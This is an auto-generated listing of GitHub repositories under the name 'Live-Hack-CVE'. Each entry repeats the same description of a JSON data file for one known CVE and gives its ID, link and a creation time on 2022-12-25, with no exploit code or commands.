**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0233 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0233](https://github.com/Live-Hack-CVE/CVE-2021-0233) create time: 2022-12-25T20:31:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-1118 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-1118](https://github.com/Live-Hack-CVE/CVE-2021-1118) create time: 2022-12-25T20:31:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0232 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0232](https://github.com/Live-Hack-CVE/CVE-2021-0232) create time: 2022-12-25T20:31:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0223](https://github.com/Live-Hack-CVE/CVE-2021-0223) create time: 2022-12-25T20:31:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-0204 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-0204](https://github.com/Live-Hack-CVE/CVE-2021-0204) create time: 2022-12-25T20:31:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-40019 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-40019](https://github.com/Live-Hack-CVE/CVE-2021-40019) create time: 2022-12-25T20:29:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-41731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-41731](https://github.com/Live-Hack-CVE/CVE-2021-41731) create time: 2022-12-25T20:28:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-31735 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-31735](https://github.com/Live-Hack-CVE/CVE-2022-31735) create time: 2022-12-25T21:15:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3222 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3222](https://github.com/Live-Hack-CVE/CVE-2022-3222) create time: 2022-12-25T21:15:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2962 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2962](https://github.com/Live-Hack-CVE/CVE-2022-2962) create time: 2022-12-25T21:15:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-20398 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-20398](https://github.com/Live-Hack-CVE/CVE-2022-20398) create time: 2022-12-25T21:14:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40636 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40636](https://github.com/Live-Hack-CVE/CVE-2022-40636) create time: 2022-12-25T21:14:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40637 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40637](https://github.com/Live-Hack-CVE/CVE-2022-40637) create time: 2022-12-25T21:14:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37724 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37724](https://github.com/Live-Hack-CVE/CVE-2022-37724) create time: 2022-12-25T21:14:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38851 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38851](https://github.com/Live-Hack-CVE/CVE-2022-38851) create time: 2022-12-25T21:14:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38865 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38865](https://github.com/Live-Hack-CVE/CVE-2022-38865) create time: 2022-12-25T21:14:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38814 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38814](https://github.com/Live-Hack-CVE/CVE-2022-38814) create time: 2022-12-25T21:14:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38326 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38326](https://github.com/Live-Hack-CVE/CVE-2022-38326) create time: 2022-12-25T21:14:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-37260 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-37260](https://github.com/Live-Hack-CVE/CVE-2022-37260) create time: 2022-12-25T21:14:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38325 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38325](https://github.com/Live-Hack-CVE/CVE-2022-38325) create time: 2022-12-25T21:14:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38866 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38866](https://github.com/Live-Hack-CVE/CVE-2022-38866) create time: 2022-12-25T21:14:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38860 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38860](https://github.com/Live-Hack-CVE/CVE-2022-38860) create time: 2022-12-25T21:14:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40654 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40654](https://github.com/Live-Hack-CVE/CVE-2022-40654) create time: 2022-12-25T21:13:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40653 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40653](https://github.com/Live-Hack-CVE/CVE-2022-40653) create time: 2022-12-25T21:13:40Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40652 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40652](https://github.com/Live-Hack-CVE/CVE-2022-40652) create time: 2022-12-25T21:13:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40651 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40651](https://github.com/Live-Hack-CVE/CVE-2022-40651) create time: 2022-12-25T21:13:34Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-36056 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-36056](https://github.com/Live-Hack-CVE/CVE-2022-36056) create time: 2022-12-25T21:13:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40650 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40650](https://github.com/Live-Hack-CVE/CVE-2022-40650) create time: 2022-12-25T21:13:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40649 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40649](https://github.com/Live-Hack-CVE/CVE-2022-40649) create time: 2022-12-25T21:13:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40648 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40648](https://github.com/Live-Hack-CVE/CVE-2022-40648) create time: 2022-12-25T21:13:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40647 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40647](https://github.com/Live-Hack-CVE/CVE-2022-40647) create time: 2022-12-25T21:13:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40646 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40646](https://github.com/Live-Hack-CVE/CVE-2022-40646) create time: 2022-12-25T21:13:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40644 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40644](https://github.com/Live-Hack-CVE/CVE-2022-40644) create time: 2022-12-25T21:13:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40645 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40645](https://github.com/Live-Hack-CVE/CVE-2022-40645) create time: 2022-12-25T21:13:08Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40643 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40643](https://github.com/Live-Hack-CVE/CVE-2022-40643) create time: 2022-12-25T21:13:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40641 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40641](https://github.com/Live-Hack-CVE/CVE-2022-40641) create time: 2022-12-25T21:13:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-40642 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-40642](https://github.com/Live-Hack-CVE/CVE-2022-40642) create time: 2022-12-25T21:12:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2014-6463 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2014-6463](https://github.com/Live-Hack-CVE/CVE-2014-6463) create time: 2022-12-25T19:53:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4895 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4895](https://github.com/Live-Hack-CVE/CVE-2015-4895) create time: 2022-12-25T19:53:42Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4757 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4757](https://github.com/Live-Hack-CVE/CVE-2015-4757) create time: 2022-12-25T19:53:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4807 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4807](https://github.com/Live-Hack-CVE/CVE-2015-4807) create time: 2022-12-25T19:53:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4913](https://github.com/Live-Hack-CVE/CVE-2015-4913) create time: 2022-12-25T19:53:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4864 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4864](https://github.com/Live-Hack-CVE/CVE-2015-4864) create time: 2022-12-25T19:53:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-4861 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-4861](https://github.com/Live-Hack-CVE/CVE-2015-4861) create time: 2022-12-25T19:53:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0499 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0499](https://github.com/Live-Hack-CVE/CVE-2015-0499) create time: 2022-12-25T19:52:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2015-0374 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2015-0374](https://github.com/Live-Hack-CVE/CVE-2015-0374) create time: 2022-12-25T19:52:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7862 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7862](https://github.com/Live-Hack-CVE/CVE-2020-7862) create time: 2022-12-25T19:55:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-6099 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-6099](https://github.com/Live-Hack-CVE/CVE-2020-6099) create time: 2022-12-25T19:55:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5410 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5410](https://github.com/Live-Hack-CVE/CVE-2020-5410) create time: 2022-12-25T19:55:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5403 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5403](https://github.com/Live-Hack-CVE/CVE-2020-5403) create time: 2022-12-25T19:55:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5351 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5351](https://github.com/Live-Hack-CVE/CVE-2020-5351) create time: 2022-12-25T19:55:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-5232 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-5232](https://github.com/Live-Hack-CVE/CVE-2020-5232) create time: 2022-12-25T19:55:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-4062 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-4062](https://github.com/Live-Hack-CVE/CVE-2020-4062) create time: 2022-12-25T19:55:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-4107 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-4107](https://github.com/Live-Hack-CVE/CVE-2020-4107) create time: 2022-12-25T19:55:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-3569 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-3569](https://github.com/Live-Hack-CVE/CVE-2020-3569) create time: 2022-12-25T19:54:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36238 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36238](https://github.com/Live-Hack-CVE/CVE-2020-36238) create time: 2022-12-25T19:54:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36287 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36287](https://github.com/Live-Hack-CVE/CVE-2020-36287) create time: 2022-12-25T19:54:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36319 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36319](https://github.com/Live-Hack-CVE/CVE-2020-36319) create time: 2022-12-25T19:54:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36332 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36332](https://github.com/Live-Hack-CVE/CVE-2020-36332) create time: 2022-12-25T19:54:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-36382 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-36382](https://github.com/Live-Hack-CVE/CVE-2020-36382) create time: 2022-12-25T19:54:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-21050 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-21050](https://github.com/Live-Hack-CVE/CVE-2020-21050) create time: 2022-12-25T19:52:20Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19001 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19001](https://github.com/Live-Hack-CVE/CVE-2020-19001) create time: 2022-12-25T19:52:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18048 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18048](https://github.com/Live-Hack-CVE/CVE-2020-18048) create time: 2022-12-25T19:52:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19750 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19750](https://github.com/Live-Hack-CVE/CVE-2020-19750) create time: 2022-12-25T19:52:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-19751 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-19751](https://github.com/Live-Hack-CVE/CVE-2020-19751) create time: 2022-12-25T19:52:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18899 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18899](https://github.com/Live-Hack-CVE/CVE-2020-18899) create time: 2022-12-25T19:52:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18885 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18885](https://github.com/Live-Hack-CVE/CVE-2020-18885) create time: 2022-12-25T19:52:00Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18778 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18778](https://github.com/Live-Hack-CVE/CVE-2020-18778) create time: 2022-12-25T19:51:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18775 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18775](https://github.com/Live-Hack-CVE/CVE-2020-18775) create time: 2022-12-25T19:51:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-18771 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-18771](https://github.com/Live-Hack-CVE/CVE-2020-18771) create time: 2022-12-25T19:51:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-25491 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-25491](https://github.com/Live-Hack-CVE/CVE-2020-25491) create time: 2022-12-25T19:47:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-36568 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-36568](https://github.com/Live-Hack-CVE/CVE-2021-36568) create time: 2022-12-25T19:51:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30676 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30676](https://github.com/Live-Hack-CVE/CVE-2022-30676) create time: 2022-12-25T19:56:59Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30678 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30678](https://github.com/Live-Hack-CVE/CVE-2022-30678) create time: 2022-12-25T19:56:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30677 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30677](https://github.com/Live-Hack-CVE/CVE-2022-30677) create time: 2022-12-25T19:56:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30681 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30681](https://github.com/Live-Hack-CVE/CVE-2022-30681) create time: 2022-12-25T19:56:49Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30680 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30680](https://github.com/Live-Hack-CVE/CVE-2022-30680) create time: 2022-12-25T19:56:46Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30682 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30682](https://github.com/Live-Hack-CVE/CVE-2022-30682) create time: 2022-12-25T19:56:43Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30683 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30683](https://github.com/Live-Hack-CVE/CVE-2022-30683) create time: 2022-12-25T19:56:39Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30685](https://github.com/Live-Hack-CVE/CVE-2022-30685) create time: 2022-12-25T19:56:36Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-38429 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-38429](https://github.com/Live-Hack-CVE/CVE-2022-38429) create time: 2022-12-25T19:56:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30686 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30686](https://github.com/Live-Hack-CVE/CVE-2022-30686) create time: 2022-12-25T19:56:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30684 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30684](https://github.com/Live-Hack-CVE/CVE-2022-30684) create time: 2022-12-25T19:56:27Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-35664 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-35664](https://github.com/Live-Hack-CVE/CVE-2022-35664) create time: 2022-12-25T19:56:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-34218 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-34218](https://github.com/Live-Hack-CVE/CVE-2022-34218) create time: 2022-12-25T19:56:20Z

